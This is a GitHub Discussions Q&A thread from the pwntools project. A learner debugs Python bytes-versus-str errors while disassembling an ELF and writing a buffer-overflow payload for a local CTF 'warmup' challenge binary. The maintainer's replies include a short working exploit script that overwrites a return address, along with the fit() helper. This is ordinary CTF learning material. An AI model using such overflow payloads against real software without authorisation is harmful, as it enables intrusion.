### DISCUSSION TITLE
how i can make it work?

### DISCUSSION THREAD

**Discussion by mayomacam** [Gallopsled/pwntools#1743] [Q&A] [answered]
I have start learning pwntools as i was writing my program and try to disassemble elf i got this error. I try to edit and convert it to same value after some try it work starting to got error in another script. Anyway i can't make it work.
'''
Traceback (most recent call last):
  File "/home/mayomacam/Music/reverse-engineering/pwntool/1.py", line 31, in <module>
    print(b.disasm(b.data, 16))
  File "/home/mayomacam/.local/lib/python3.9/site-packages/pwnlib/elf/elf.py", line 1489, in disasm
    return disasm(self.read(address, n_bytes), vma=address, arch=arch, endian=self.endian)
  File "/home/mayomacam/.local/lib/python3.9/site-packages/pwnlib/elf/elf.py", line 1379, in read
    stop = address + count
TypeError: can't concat int to bytes
'''

**Comment by Arusekk** [comment]
What type is b? is it an ELF? Maybe this deserves opening an issue?

**Reply by mayomacam** [reply]
yup b is a elf binary file from a reversing challange. And i wil open a issue. with code and details of files..

**Reply by Arusekk** [reply, marked as answer]
Alright, I now had a closer look and I think that this makes no sense: [`ELF.disasm`](https://docs.pwntools.com/en/stable/elf/elf.html#pwnlib.elf.elf.ELF.disasm) takes **address** and size; you gave it **some binary data** and size, so it is no wonder that it didn't work.

Maybe you meant b.disasm(**b.address**, 16)? Or b.disasm(**b.sym.data**, 16)?

**Reply by mayomacam** [reply]
Yup that was indeed a mistake from my side that's why at first I open a discussion. Thanks for clearing to me.

**Reply by mayomacam** [reply]
one more thing here is one problem if i can get about this that will be great...
```
[+] Starting local process './warmup' argv=[b'./warmup'] : pid 52534
Traceback (most recent call last):
  File "exploit.py", line 7, in <module>
    payload += p64(0x0040060d)
TypeError: can only concatenate str (not "bytes") to str
```
code:-
```
from pwn import *
context.log_level='debug'
b = process("./warmup")
payload = ''
payload += '0'*64
#payload += '0'*0x40
#payload +=  "\x0d\x06\x40"   #here it work fine.. but with p32 or p64 depending upon binary give error
payload += p64(0x0040060d)
b.sendline(payload)
print(payload)
b.recvall()
b.interactive()
```
when ever i am using this i am getting the same error even when i run commented value..

**Reply by Arusekk** [reply]
This is as clear as it could be this time: you cannot add bytes to a str. You need to add bytes to bytes.
```py
from pwn import *
context.log_level='debug'
b = process("./warmup")
payload = b''
payload += b'0'*64
#payload += b'0'*0x40
#payload +=  b"\x0d\x06\x40"   #here it work fine.. but with p32 or p64 depending upon binary give error
payload += p64(0x0040060d)
b.sendline(payload)
print(payload)
b.recvall()
b.interactive()
```

Also, have you heard about the great `fit()` function?
```py
payload = fit({
    64 + 0x40: 0x0040060d
})
```
and it magically pads and packs stuff around so that it just works ^TM.

This is a huge thing that many people repeatedly fail to understand: *binary data* is *not* transparently convertible back and forth to *text*, unless you mean *encoding/decoding* it. See [PEP 332](https://www.python.org/dev/peps/pep-0332/#rationale) for why this is a huge trap to think that they are the same.

Pwntools aims to be easy and friendly and allows not only `p.sendline(b"hello")`, but `p.sendline("hello")` as well. This is a design choice I was not a strong supporter for, since I thought it would just confuse people like you, but I agreed that it is common to just omit `b` by chance while typing, so it speeds up rapid exploit development, and old exploits (written for py2 only) can often be made to work with less headache.

**Reply by mayomacam** [reply]
Thanks for telling me about `fit()` and confusion related bytes, no one tells me about it now. I am glad i asked about it.
